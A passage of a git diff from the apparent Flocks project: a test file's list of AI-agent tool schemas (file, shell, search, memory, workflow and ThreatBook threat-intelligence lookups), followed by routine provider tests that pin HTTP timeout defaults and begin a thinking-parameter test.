a symbol\n- documentSymbol: List all symbols in a file\n- workspaceSymbol: Search symbols across workspace\n- goToImplementation: Find implementations of an interface\n- prepareCallHierarchy: Get call hierarchy item at position\n- incomingCalls: Find callers of a function\n- outgoingCalls: Find functions called by a function\n\nParameters:\n- operation: The LSP operation to perform\n- filePath: Path to the file\n- line: Line number (1-based)\n- character: Character offset (1-based)', 'parameters': {'type': 'object', 'properties': {'operation': {'type': 'string', 'description': 'The LSP operation to perform', 'enum': ['goToDefinition', 'findReferences', 'hover', 'documentSymbol', 'workspaceSymbol', 'goToImplementation', 'prepareCallHierarchy', 'incomingCalls', 'outgoingCalls']}, 'filePath': {'type': 'string', 'description': 'The absolute or relative path to the file'}, 'line': {'type': 'integer', 'description': 'The line number (1-based, as shown in editors)'}, 'character': {'type': 'integer', 'description': 'The character offset (1-based, as shown in editors)'}}, 'required': ['operation', 'filePath', 'line', 'character']}}}, {'type': 'function', 'function': {'name': 'skill', 'description': "Load a skill to get detailed instructions for a specific task. Skills provide specialized knowledge and step-by-step guidance. Use this when a task matches an available skill's description. <available_skills>   <skill>     <name>workflow-generator</name>     <description>根据自然语言描述生成 flocks 内置工作流（workflow.md, workflow.json, workflow.html）。当用户提出创建/设计/生成/搭建工作流或任何多步骤流程（如告警调查、事件响应、SOP/Runbook 自动化）时使用本 skill。</description>   </skill>   <skill>     <name>tool-builder</name>     <description>Creates a new Flocks tool from user requirements, writes metadata, adds unit tests, and hot-reloads the tool without restarting. 
Use when the user asks to create a new tool, add a new API integration, or generate a tool from a requirement.</description>   </skill> </available_skills>", 'parameters': {'type': 'object', 'properties': {'name': {'type': 'string', 'description': 'The skill identifier from available_skills'}}, 'required': ['name']}}}, {'type': 'function', 'function': {'name': 'run_workflow', 'description': 'Execute a workflow definition using the flocks-workflow runtime.\n\nWhen to use:\n- You need to execute a workflow.\n- You have an existing JSON/dict structure or a workflow JSON file and user request to execute it.\n- Execute workflow when workflow has been generated.\n\nHow to use:\n- Provide the workflow definition (dictionary, JSON string, or file path).\n- The workflow file path should be an absolute path. IMPORTANT: In JSON, file paths must be quoted strings (e.g. "workflow": "/path/to/workflow.json"). Unquoted paths will cause parse errors.\n- Optional: Provide input parameters, timeout settings, and whether to use LLM for logic node codegen.\n\nNote:\n- This tool depends on an existing workflow file.\n- workflow maybe execute failed, you need to check the workflow file and the input parameters. If execute failed, change parameters and fix workflow-exec.json (don\'t change workflow.json).\n- If no workflow file exists, ask user to specify the workflow file path or use the `workflow-generator` skill to create.', 'parameters': {'type': 'object', 'properties': {'workflow': {'anyOf': [{'type': 'object', 'description': 'Workflow definition as an object (dict)'}, {'type': 'string', 'description': 'Workflow JSON string or a workflow JSON file path'}], 'description': 'Workflow definition (dict). 
If passing a string, provide a JSON string or a workflow JSON file path.'}, 'inputs': {'type': 'object', 'additionalProperties': True, 'description': 'Input parameters for the workflow execution', 'default': {}}, 'use_llm': {'type': 'boolean', 'description': 'Enable LLM-backed code generation for `type="logic"` nodes (when code is missing). Recommended to keep enabled for logic-node workflows.', 'default': True}, 'ensure_requirements': {'type': 'boolean', 'description': 'Whether to automatically install requirements declared in workflow metadata', 'default': True}, 'timeout_s': {'type': 'number', 'description': 'Execution timeout in seconds (optional)'}, 'trace': {'type': 'boolean', 'description': 'Enable execution tracing for debugging', 'default': False}}, 'required': ['workflow']}}}, {'type': 'function', 'function': {'name': 'websearch', 'description': "Search the web for real-time information about any topic.\n\nUse this tool when you need:\n- Up-to-date information that might not be in training data\n- Current events or technology news\n- Documentation for libraries, frameworks, or tools\n- Verification of current facts\n\nToday's date: 2026-02-11\nUse the current year when searching for recent information.\n\nParameters:\n- query: Search query (be specific for better results)\n- numResults: Number of results to return (default: 8)\n- type: Search type - auto, fast, or deep", 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': 'Web search query'}, 'numResults': {'type': 'integer', 'description': 'Number of search results to return (default: 8)', 'default': 8}, 'type': {'type': 'string', 'description': "Search type - 'auto': balanced, 'fast': quick, 'deep': comprehensive", 'default': 'auto', 'enum': ['auto', 'fast', 'deep']}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'codesearch', 'description': "Search for security examples, documentation, and API usage patterns.\n\nUse this tool when you 
need:\n- Security examples for a specific tool or framework\n- API documentation and usage patterns\n- Best practices for specific programming tasks\n- Implementation references\n\nParameters:\n- query: Search query (e.g., 'YARA malware detection rules', 'Suricata IDS signatures')\n- tokensNum: Amount of context to return (1000-50000, default: 5000)\n\nTips:\n- Be specific about the security tool/framework\n- Include the security tool or technology if relevant\n- Use higher tokensNum for comprehensive documentation", 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': "Search query for security context (e.g., 'YARA malware detection rules')"}, 'tokensNum': {'type': 'integer', 'description': 'Number of tokens to return (1000-50000, default: 5000)', 'default': 5000}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'apply_patch', 'description': 'Apply a patch to modify files.\n\nThis tool is designed for advanced patch-based editing, supporting:\n- File creation (add)\n- File modification (update)\n- File deletion (delete)\n- File moves (update with move_path)\n\nPatch format:\n*** Begin Patch\n*** Add File: path/to/new/file.py\ncontent of new file\n*** Update File: path/to/existing/file.py\n@@@ ... 
@@@\n-old line\n+new line\n*** Delete File: path/to/delete.py\n*** End Patch\n\nUse the edit tool for simple string replacements.\nUse apply_patch for complex multi-file changes.', 'parameters': {'type': 'object', 'properties': {'patchText': {'type': 'string', 'description': 'The full patch text that describes all changes to be made'}}, 'required': ['patchText']}}}, {'type': 'function', 'function': {'name': 'memory_search', 'description': 'Search project memory using a natural language query.', 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': 'Natural language search query.'}, 'max_results': {'type': 'integer', 'description': 'Maximum number of results to return (default: 10).'}, 'min_score': {'type': 'number', 'description': 'Minimum similarity score 0-1 (default: 0.6).'}, 'sources': {'type': 'array', 'description': "Sources to search: ['memory', 'session'] (default: ['memory']).", 'items': {'type': 'string'}}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'memory_get', 'description': 'Retrieve memory file content by path, optionally filtered by line range.', 'parameters': {'type': 'object', 'properties': {'path': {'type': 'string', 'description': 'Memory file path relative to memory root.'}, 'from_line': {'type': 'integer', 'description': 'Starting line number (1-based).'}, 'lines': {'type': 'integer', 'description': 'Number of lines to return.'}}, 'required': ['path']}}}, {'type': 'function', 'function': {'name': 'memory_write', 'description': 'Write content to memory files for long-term recall.', 'parameters': {'type': 'object', 'properties': {'content': {'type': 'string', 'description': 'Content to write to memory.'}, 'path': {'type': 'string', 'description': 'Target path relative to memory root (default: YYYY-MM-DD.md).'}, 'append': {'type': 'boolean', 'description': 'Append to existing file (default: true).'}}, 'required': ['content']}}}, {'type': 'function', 'function': {'name': 'echo', 
'description': 'Echo back the input message', 'parameters': {'type': 'object', 'properties': {'message': {'type': 'string', 'description': 'Message to echo'}}, 'required': ['message']}}}, {'type': 'function', 'function': {'name': 'get_time', 'description': 'Get current date and time', 'parameters': {'type': 'object', 'properties': {}}}}, {'type': 'function', 'function': {'name': 'threatbook_ip_query', 'description': "Query IP address threat intelligence from ThreatBook API. Use this tool to get threat information about an IP address, including geographic location, threat severity, malicious behavior indicators, and security judgments. Example: To query '8.8.8.8', pass ip='8.8.8.8'.", 'parameters': {'type': 'object', 'properties': {'ip': {'type': 'string', 'description': "The IP address to query (e.g., '8.8.8.8', '192.168.1.1'). This is a required parameter and must be a valid IP address string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['ip']}}}, {'type': 'function', 'function': {'name': 'threatbook_domain_query', 'description': "Query domain threat intelligence from ThreatBook API. Use this tool to get threat information about a domain, including DNS records, WHOIS data, threat severity, and security judgments. Example: To query 'example.com', pass domain='example.com'.", 'parameters': {'type': 'object', 'properties': {'domain': {'type': 'string', 'description': "The domain name to query (e.g., 'example.com', 'google.com'). This is a required parameter and must be a valid domain name string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['domain']}}}, {'type': 'function', 'function': {'name': 'threatbook_file_query', 'description': "Query file hash threat intelligence from ThreatBook API. 
Use this tool to get malware analysis results, antivirus detection results, and threat information about a file hash. Supports MD5, SHA1, and SHA256 hashes. Example: To query a hash, pass file_hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'.", 'parameters': {'type': 'object', 'properties': {'file_hash': {'type': 'string', 'description': "The file hash to query. Can be MD5, SHA1, or SHA256 format (e.g., 'a1b2c3d4...', '5e6f7a8b...'). This is a required parameter and must be a valid hash string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['file_hash']}}}]
+TOOLS = [{'type': 'function', 'function': {'name': 'read', 'description': "Reads a file from the local filesystem. You can access any file directly by using this tool.\nAssume this tool is able to read all files on the machine. If the User provides a path to a file assume that path is valid. It is okay to read a file that does not exist; an error will be returned.\n\nUsage:\n- The filePath parameter must be an absolute path, not a relative path\n- By default, it reads up to 2000 lines starting from the beginning of the file\n- You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters\n- Any lines longer than 2000 characters will be truncated\n- Results are returned using cat -n format, with line numbers starting at 1\n- You may call multiple independent tools in the same response. Prefer separate parallel Read calls when multiple files are likely to be useful.\n- If you read a file that exists but has empty contents you will receive a system reminder warning in place of file contents.\n- You can read image files using this tool.", 'parameters': {'type': 'object', 'properties': {'filePath': {'type': 'string', 'description': 'The path to the file to read'}, 'offset': {'type': 'integer', 'description': 'The line number to start reading from (0-based)', 'default': 0}, 'limit': {'type': 'integer', 'description': 'The number of lines to read (defaults to 2000)', 'default': 2000}}, 'required': ['filePath']}}}, {'type': 'function', 'function': {'name': 'write', 'description': "Writes a file to the local filesystem.\n\nUsage:\n- This tool will overwrite the existing file if there is one at the provided path.\n- If this is an existing file, you MUST use the Read tool first to read the file's contents. This tool will fail if you did not read the file first.\n- ALWAYS prefer editing existing files in the codebase. 
NEVER write new files unless explicitly required.\n- NEVER proactively create documentation files (*.md) or README files. Only create documentation files if explicitly requested by the User.\n- Only use emojis if the user explicitly requests it. Avoid writing emojis to files unless asked.", 'parameters': {'type': 'object', 'properties': {'content': {'type': 'string', 'description': 'The content to write to the file'}, 'filePath': {'type': 'string', 'description': 'The absolute path to the file to write (must be absolute, not relative)'}}, 'required': ['content', 'filePath']}}}, {'type': 'function', 'function': {'name': 'edit', 'description': 'Performs exact string replacements in files. \n\nUsage:\n- You must use your `Read` tool at least once in the conversation before editing. This tool will error if you attempt an edit without reading the file. \n- When editing text from Read tool output, ensure you preserve the exact indentation (tabs/spaces) as it appears AFTER the line number prefix. The line number prefix format is: spaces + line number + tab. Everything after that tab is the actual file content to match. Never include any part of the line number prefix in the oldString or newString.\n- ALWAYS prefer editing existing files in the codebase. NEVER write new files unless explicitly required.\n- Only use emojis if the user explicitly requests it. Avoid adding emojis to files unless asked.\n- The edit will FAIL if `oldString` is not found in the file with an error "oldString not found in content".\n- The edit will FAIL if `oldString` is found multiple times in the file with an error "oldString found multiple times and requires more code context to uniquely identify the intended match". Either provide a larger string with more surrounding context to make it unique or use `replaceAll` to change every instance of `oldString`. \n- Use `replaceAll` for replacing and renaming strings across the file. 
This parameter is useful if you want to rename a variable for instance.', 'parameters': {'type': 'object', 'properties': {'filePath': {'type': 'string', 'description': 'The absolute path to the file to modify'}, 'oldString': {'type': 'string', 'description': 'The text to replace'}, 'newString': {'type': 'string', 'description': 'The text to replace it with (must be different from oldString)'}, 'replaceAll': {'type': 'boolean', 'description': 'Replace all occurrences of oldString (default false)', 'default': False}}, 'required': ['filePath', 'oldString', 'newString']}}}, {'type': 'function', 'function': {'name': 'bash', 'description': 'Executes a given bash command in a persistent shell session with optional timeout, ensuring proper handling and security measures.\n\nAll commands run in /Users/chenjie/Library/Mobile Documents/com~apple~CloudDocs/0_work/projects/threatbook/flocks by default. Use the `workdir` parameter if you need to run a command in a different directory. AVOID using `cd <directory> && <command>` patterns - use `workdir` instead.\n\nIMPORTANT: This tool is for terminal operations like git, npm, docker, etc. DO NOT use it for file operations (reading, writing, editing, searching, finding files) - use the specialized tools for this instead.\n\nBefore executing the command, please follow these steps:\n\n1. Directory Verification:\n   - If the command will create new directories or files, first use `ls` to verify the parent directory exists and is the correct location\n   - For example, before running "mkdir foo/bar", first use `ls foo` to check that "foo" exists and is the intended parent directory\n\n2. 
Command Execution:\n   - Always quote file paths that contain spaces with double quotes (e.g., rm "path with spaces/file.txt")\n   - Examples of proper quoting:\n     - mkdir "/Users/name/My Documents" (correct)\n     - mkdir /Users/name/My Documents (incorrect - will fail)\n     - python "/path/with spaces/script.py" (correct)\n     - python /path/with spaces/script.py (incorrect - will fail)\n   - After ensuring proper quoting, execute the command.\n   - Capture the output of the command.\n\nUsage notes:\n  - The command argument is required.\n  - You can specify an optional timeout in milliseconds. If not specified, commands will time out after 120000ms (2 minutes).\n  - It is very helpful if you write a clear, concise description of what this command does in 5-10 words.\n  - If the output exceeds 1000 lines or 102400 bytes, it will be truncated and the full output will be written to a file.\n  - Avoid using Bash with the `find`, `grep`, `cat`, `head`, `tail`, `sed`, `awk`, or `echo` commands. Instead, use the dedicated tools: Glob, Grep, Read, Edit, Write.\n  - When issuing multiple commands:\n    - If the commands are independent and can run in parallel, make multiple Bash tool calls in a single message.\n    - If the commands depend on each other, use a single Bash call with \'&&\' to chain them together.\n    - Use \';\' only when you need to run commands sequentially but don\'t care if earlier commands fail\n  - AVOID using `cd <directory> && <command>`. Use the `workdir` parameter to change directories instead.', 'parameters': {'type': 'object', 'properties': {'command': {'type': 'string', 'description': 'The command to execute'}, 'timeout': {'type': 'integer', 'description': 'Optional timeout in milliseconds', 'default': 120000}, 'workdir': {'type': 'string', 'description': 'The working directory to run the command in. 
Defaults to project directory.'}, 'description': {'type': 'string', 'description': 'Clear, concise description of what this command does in 5-10 words'}}, 'required': ['command']}}}, {'type': 'function', 'function': {'name': 'grep', 'description': '- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. "log.*Error", "function\\s+\\w+", etc.)\n- Filter files by pattern with the include parameter (eg. "*.js", "*.{ts,tsx}")\n- Returns file paths and line numbers with at least one match sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- If you need to identify/count the number of matches within files, use the Bash tool with `rg` (ripgrep) directly. Do NOT use `grep`.\n- When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead', 'parameters': {'type': 'object', 'properties': {'pattern': {'type': 'string', 'description': 'The regex pattern to search for in file contents'}, 'path': {'type': 'string', 'description': 'The directory to search in. Defaults to the current working directory.'}, 'include': {'type': 'string', 'description': 'File pattern to include in the search (e.g. "*.js", "*.{ts,tsx}")'}}, 'required': ['pattern']}}}, {'type': 'function', 'function': {'name': 'glob', 'description': '- Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like "**/*.js" or "src/**/*.ts"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead\n- You may call multiple independent tools in the same response. 
Prefer separate parallel Glob calls when multiple searches are likely to be useful.', 'parameters': {'type': 'object', 'properties': {'pattern': {'type': 'string', 'description': 'The glob pattern to match files against'}, 'path': {'type': 'string', 'description': 'The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter "undefined" or "null" - simply omit it for the default behavior.'}}, 'required': ['pattern']}}}, {'type': 'function', 'function': {'name': 'list', 'description': 'Lists files and directories in a given path. The path parameter must be absolute; omit it to use the current workspace directory. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.', 'parameters': {'type': 'object', 'properties': {'path': {'type': 'string', 'description': 'The absolute path to the directory to list (must be absolute, not relative)'}, 'ignore': {'type': 'array', 'description': 'List of glob patterns to ignore', 'items': {'type': 'string'}}}}}}, {'type': 'function', 'function': {'name': 'webfetch', 'description': 'Fetch content from a specified URL and return its contents in a readable format.\n\nUsage:\n- The URL must be a fully-formed, valid URL starting with http:// or https://\n- By default, returns content in markdown format (HTML is converted)\n- Supports text, markdown, and html output formats\n- Has a default timeout of 30 seconds (configurable up to 120 seconds)\n- Response size is limited to 5MB', 'parameters': {'type': 'object', 'properties': {'url': {'type': 'string', 'description': 'The URL to fetch content from'}, 'format': {'type': 'string', 'description': 'The format to return content in (text, markdown, or html). 
Defaults to markdown.', 'default': 'markdown', 'enum': ['text', 'markdown', 'html']}, 'timeout': {'type': 'integer', 'description': 'Optional timeout in seconds (max 120)', 'default': 30}}, 'required': ['url']}}}, {'type': 'function', 'function': {'name': 'todo', 'description': 'Use this tool to read or manage the current todo list.', 'parameters': {'type': 'object', 'properties': {'action': {'type': 'string', 'enum': ['read', 'write']}, 'todos': {'type': 'array', 'items': {'type': 'object'}}}, 'required': ['action']}}}, {'type': 'function', 'function': {'name': 'question', 'description': "Ask the user a question and wait for their response.\n\nUse this tool when you need to:\n- Confirm before making significant changes\n- Get user preference between multiple options\n- Clarify ambiguous instructions\n\nQuestion format:\n- Each question has a text prompt\n- Optional header for context\n- List of options for the user to choose from\n- Options have label and optional description\n\nThe user's answers will be returned for you to continue with.", 'parameters': {'type': 'object', 'properties': {'questions': {'type': 'array', 'items': {'type': 'object', 'properties': {'question': {'type': 'string', 'description': 'Question text prompt'}, 'header': {'type': 'string', 'description': 'Optional header/context for the question'}, 'options': {'type': 'array', 'description': 'Options for the user to select', 'items': {'anyOf': [{'type': 'string'}, {'type': 'object', 'properties': {'label': {'type': 'string'}, 'description': {'type': 'string'}}, 'required': ['label'], 'additionalProperties': False}]}}}, 'required': ['question'], 'additionalProperties': True}, 'description': 'Array of questions to ask the user'}}, 'required': ['questions']}}}, {'type': 'function', 'function': {'name': 'task', 'description': 'Launch a new agent to handle complex, multi-step tasks autonomously.\n\nUse this tool when:\n- The task requires multiple steps or research\n- You need to explore code in 
parallel\n- The task can be delegated to a specialized agent\n\nAvailable subagent types:\n- general: General-purpose agent for multi-step tasks\n- explore: Fast code exploration agent for quick searches\n- review: Code review agent (if available)\n\nUsage notes:\n- Provide a clear description (3-5 words)\n- Provide detailed prompt with context\n- The subagent runs autonomously and returns results\n- Use for tasks that can be parallelized', 'parameters': {'type': 'object', 'properties': {'description': {'type': 'string', 'description': 'A short (3-5 words) description of the task'}, 'prompt': {'type': 'string', 'description': 'The task for the agent to perform'}, 'subagent_type': {'type': 'string', 'description': 'The type of specialized agent to use (general, explore, review)', 'enum': ['general', 'explore', 'review']}, 'session_id': {'type': 'string', 'description': 'Optional existing session ID to continue'}}, 'required': ['description', 'prompt', 'subagent_type']}}}, {'type': 'function', 'function': {'name': 'lsp', 'description': 'Perform LSP (Language Server Protocol) operations for code intelligence.\n\nSupported operations:\n- goToDefinition: Jump to where a symbol is defined\n- findReferences: Find all usages of a symbol\n- hover: Get type/documentation info for a symbol\n- documentSymbol: List all symbols in a file\n- workspaceSymbol: Search symbols across workspace\n- goToImplementation: Find implementations of an interface\n- prepareCallHierarchy: Get call hierarchy item at position\n- incomingCalls: Find callers of a function\n- outgoingCalls: Find functions called by a function\n\nParameters:\n- operation: The LSP operation to perform\n- filePath: Path to the file\n- line: Line number (1-based)\n- character: Character offset (1-based)', 'parameters': {'type': 'object', 'properties': {'operation': {'type': 'string', 'description': 'The LSP operation to perform', 'enum': ['goToDefinition', 'findReferences', 'hover', 'documentSymbol', 'workspaceSymbol', 
'goToImplementation', 'prepareCallHierarchy', 'incomingCalls', 'outgoingCalls']}, 'filePath': {'type': 'string', 'description': 'The absolute or relative path to the file'}, 'line': {'type': 'integer', 'description': 'The line number (1-based, as shown in editors)'}, 'character': {'type': 'integer', 'description': 'The character offset (1-based, as shown in editors)'}}, 'required': ['operation', 'filePath', 'line', 'character']}}}, {'type': 'function', 'function': {'name': 'skill', 'description': "Load a skill to get detailed instructions for a specific task. Skills provide specialized knowledge and step-by-step guidance. Use this when a task matches an available skill's description. <available_skills>   <skill>     <name>workflow-generator</name>     <description>根据自然语言描述生成 flocks 内置工作流（workflow.md, workflow.json, workflow.html）。当用户提出创建/设计/生成/搭建工作流或任何多步骤流程（如告警调查、事件响应、SOP/Runbook 自动化）时使用本 skill。</description>   </skill>   <skill>     <name>tool-builder</name>     <description>Creates a new Flocks tool from user requirements, writes metadata, adds unit tests, and hot-reloads the tool without restarting. Use when the user asks to create a new tool, add a new API integration, or generate a tool from a requirement.</description>   </skill> </available_skills>", 'parameters': {'type': 'object', 'properties': {'name': {'type': 'string', 'description': 'The skill identifier from available_skills'}}, 'required': ['name']}}}, {'type': 'function', 'function': {'name': 'run_workflow', 'description': 'Execute a workflow definition using the flocks-workflow runtime.\n\nWhen to use:\n- You need to execute a workflow.\n- You have an existing JSON/dict structure or a workflow JSON file and user request to execute it.\n- Execute workflow when workflow has been generated.\n\nHow to use:\n- Provide the workflow definition (dictionary, JSON string, or file path).\n- The workflow file path should be an absolute path. IMPORTANT: In JSON, file paths must be quoted strings (e.g. 
"workflow": "/path/to/workflow.json"). Unquoted paths will cause parse errors.\n- Optional: Provide input parameters, timeout settings, and whether to use LLM for logic node codegen.\n\nNote:\n- This tool depends on an existing workflow file.\n- workflow maybe execute failed, you need to check the workflow file and the input parameters. If execute failed, change parameters and fix workflow-exec.json (don\'t change workflow.json).\n- If no workflow file exists, ask user to specify the workflow file path or use the `workflow-generator` skill to create.', 'parameters': {'type': 'object', 'properties': {'workflow': {'anyOf': [{'type': 'object', 'description': 'Workflow definition as an object (dict)'}, {'type': 'string', 'description': 'Workflow JSON string or a workflow JSON file path'}], 'description': 'Workflow definition (dict). If passing a string, provide a JSON string or a workflow JSON file path.'}, 'inputs': {'type': 'object', 'additionalProperties': True, 'description': 'Input parameters for the workflow execution', 'default': {}}, 'use_llm': {'type': 'boolean', 'description': 'Enable LLM-backed code generation for `type="logic"` nodes (when code is missing). 
Recommended to keep enabled for logic-node workflows.', 'default': True}, 'ensure_requirements': {'type': 'boolean', 'description': 'Whether to automatically install requirements declared in workflow metadata', 'default': True}, 'timeout_s': {'type': 'number', 'description': 'Execution timeout in seconds (optional)'}, 'trace': {'type': 'boolean', 'description': 'Enable execution tracing for debugging', 'default': False}}, 'required': ['workflow']}}}, {'type': 'function', 'function': {'name': 'websearch', 'description': "Search the web for real-time information about any topic.\n\nUse this tool when you need:\n- Up-to-date information that might not be in training data\n- Current events or technology news\n- Documentation for libraries, frameworks, or tools\n- Verification of current facts\n\nToday's date: 2026-02-11\nUse the current year when searching for recent information.\n\nParameters:\n- query: Search query (be specific for better results)\n- numResults: Number of results to return (default: 8)\n- type: Search type - auto, fast, or deep", 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': 'Web search query'}, 'numResults': {'type': 'integer', 'description': 'Number of search results to return (default: 8)', 'default': 8}, 'type': {'type': 'string', 'description': "Search type - 'auto': balanced, 'fast': quick, 'deep': comprehensive", 'default': 'auto', 'enum': ['auto', 'fast', 'deep']}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'codesearch', 'description': "Search for security examples, documentation, and API usage patterns.\n\nUse this tool when you need:\n- Security examples for a specific tool or framework\n- API documentation and usage patterns\n- Best practices for specific programming tasks\n- Implementation references\n\nParameters:\n- query: Search query (e.g., 'YARA malware detection rules', 'Suricata IDS signatures')\n- tokensNum: Amount of context to return (1000-50000, default: 
5000)\n\nTips:\n- Be specific about the security tool/framework\n- Include the security tool or technology if relevant\n- Use higher tokensNum for comprehensive documentation", 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': "Search query for security context (e.g., 'YARA malware detection rules')"}, 'tokensNum': {'type': 'integer', 'description': 'Number of tokens to return (1000-50000, default: 5000)', 'default': 5000}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'apply_patch', 'description': 'Apply a patch to modify files.\n\nThis tool is designed for advanced patch-based editing, supporting:\n- File creation (add)\n- File modification (update)\n- File deletion (delete)\n- File moves (update with move_path)\n\nPatch format:\n*** Begin Patch\n*** Add File: path/to/new/file.py\ncontent of new file\n*** Update File: path/to/existing/file.py\n@@@ ... @@@\n-old line\n+new line\n*** Delete File: path/to/delete.py\n*** End Patch\n\nUse the edit tool for simple string replacements.\nUse apply_patch for complex multi-file changes.', 'parameters': {'type': 'object', 'properties': {'patchText': {'type': 'string', 'description': 'The full patch text that describes all changes to be made'}}, 'required': ['patchText']}}}, {'type': 'function', 'function': {'name': 'memory_search', 'description': 'Search project memory using a natural language query.', 'parameters': {'type': 'object', 'properties': {'query': {'type': 'string', 'description': 'Natural language search query.'}, 'max_results': {'type': 'integer', 'description': 'Maximum number of results to return (default: 10).'}, 'min_score': {'type': 'number', 'description': 'Minimum similarity score 0-1 (default: 0.6).'}, 'sources': {'type': 'array', 'description': "Sources to search: ['memory', 'session'] (default: ['memory']).", 'items': {'type': 'string'}}}, 'required': ['query']}}}, {'type': 'function', 'function': {'name': 'memory_get', 'description': 
'Retrieve memory file content by path, optionally filtered by line range.', 'parameters': {'type': 'object', 'properties': {'path': {'type': 'string', 'description': 'Memory file path relative to memory root.'}, 'from_line': {'type': 'integer', 'description': 'Starting line number (1-based).'}, 'lines': {'type': 'integer', 'description': 'Number of lines to return.'}}, 'required': ['path']}}}, {'type': 'function', 'function': {'name': 'memory_write', 'description': 'Write content to memory files for long-term recall.', 'parameters': {'type': 'object', 'properties': {'content': {'type': 'string', 'description': 'Content to write to memory.'}, 'path': {'type': 'string', 'description': 'Target path relative to memory root (default: YYYY-MM-DD.md).'}, 'append': {'type': 'boolean', 'description': 'Append to existing file (default: true).'}}, 'required': ['content']}}}, {'type': 'function', 'function': {'name': 'echo', 'description': 'Echo back the input message', 'parameters': {'type': 'object', 'properties': {'message': {'type': 'string', 'description': 'Message to echo'}}, 'required': ['message']}}}, {'type': 'function', 'function': {'name': 'get_time', 'description': 'Get current date and time', 'parameters': {'type': 'object', 'properties': {}}}}, {'type': 'function', 'function': {'name': 'threatbook_ip_query', 'description': "Query IP address threat intelligence from ThreatBook API. Use this tool to get threat information about an IP address, including geographic location, threat severity, malicious behavior indicators, and security judgments. Example: To query '8.8.8.8', pass ip='8.8.8.8'.", 'parameters': {'type': 'object', 'properties': {'ip': {'type': 'string', 'description': "The IP address to query (e.g., '8.8.8.8', '192.168.1.1'). 
This is a required parameter and must be a valid IP address string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['ip']}}}, {'type': 'function', 'function': {'name': 'threatbook_domain_query', 'description': "Query domain threat intelligence from ThreatBook API. Use this tool to get threat information about a domain, including DNS records, WHOIS data, threat severity, and security judgments. Example: To query 'example.com', pass domain='example.com'.", 'parameters': {'type': 'object', 'properties': {'domain': {'type': 'string', 'description': "The domain name to query (e.g., 'example.com', 'google.com'). This is a required parameter and must be a valid domain name string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['domain']}}}, {'type': 'function', 'function': {'name': 'threatbook_file_query', 'description': "Query file hash threat intelligence from ThreatBook API. Use this tool to get malware analysis results, antivirus detection results, and threat information about a file hash. Supports MD5, SHA1, and SHA256 hashes. Example: To query a hash, pass file_hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'.", 'parameters': {'type': 'object', 'properties': {'file_hash': {'type': 'string', 'description': "The file hash to query. Can be MD5, SHA1, or SHA256 format (e.g., 'a1b2c3d4...', '5e6f7a8b...'). This is a required parameter and must be a valid hash string."}, 'lang': {'type': 'string', 'description': 'Response language (en or zh)', 'default': 'en', 'enum': ['zh', 'en']}}, 'required': ['file_hash']}}}]
 
 # ============================================================================
 # Test Functions
diff --git a/tests/provider/test_openai_base_provider.py b/tests/provider/test_openai_base_provider.py
index 6f14efafe..f4beeea4a 100644
--- a/tests/provider/test_openai_base_provider.py
+++ b/tests/provider/test_openai_base_provider.py
@@ -50,6 +50,15 @@ def __init__(self):
 
 class TestOpenAIBaseProviderGetModels:
     """Test suite for get_models() method."""
+
+    def test_default_http_timeout_values(self):
+        """Pin the shared default timeout: fail-fast read, long write."""
+        defaults = openai_base_module.DEFAULT_HTTP_TIMEOUT
+        expected = {"connect": 30.0, "read": 180.0, "write": 1800.0, "pool": 60.0}
+
+        # Compare phase by phase so a failure names the value that drifted.
+        for phase, value in expected.items():
+            assert getattr(defaults, phase) == value, phase
     
     def test_get_models_with_catalog_success(self):
         """Test get_models() returns configured models."""
@@ -371,10 +380,10 @@ def test_get_client_respects_verify_ssl_false(self, mock_async_openai, mock_http
         timeout_arg = kwargs["timeout"]
         # Either an httpx.Timeout instance or compatible object: assert the
         # connect/read/write components rather than equality so future tweaks
-        # to non-essential pool/write durations don't break the test.
+        # to non-essential pool durations don't break the test.
         assert getattr(timeout_arg, "connect", None) == 30.0
-        assert getattr(timeout_arg, "read", None) == 600.0
-        assert getattr(timeout_arg, "write", None) == 600.0
+        assert getattr(timeout_arg, "read", None) == 180.0
+        assert getattr(timeout_arg, "write", None) == 1800.0
 
         mock_async_openai.assert_called_once_with(
             api_key="test-api-key",
diff --git a/tests/provider/test_thinking_params.py b/tests/provider/test_thinking_params.py
index 4ace790e0..6d838d8fe 100644
--- a/tests/provider/test_thinking_params.py
+++ b/tests/provider/test_thinking_params.py
@@ -347,6 +347,71 @@ def test_explicit_reasoning_toggle_propagates(self) -> None:
         )
         assert options["extra_body"]["enable_thinking"] is False
 
+    @pytest.mark.parametrize(
+        "configured_extra_body",
+        [
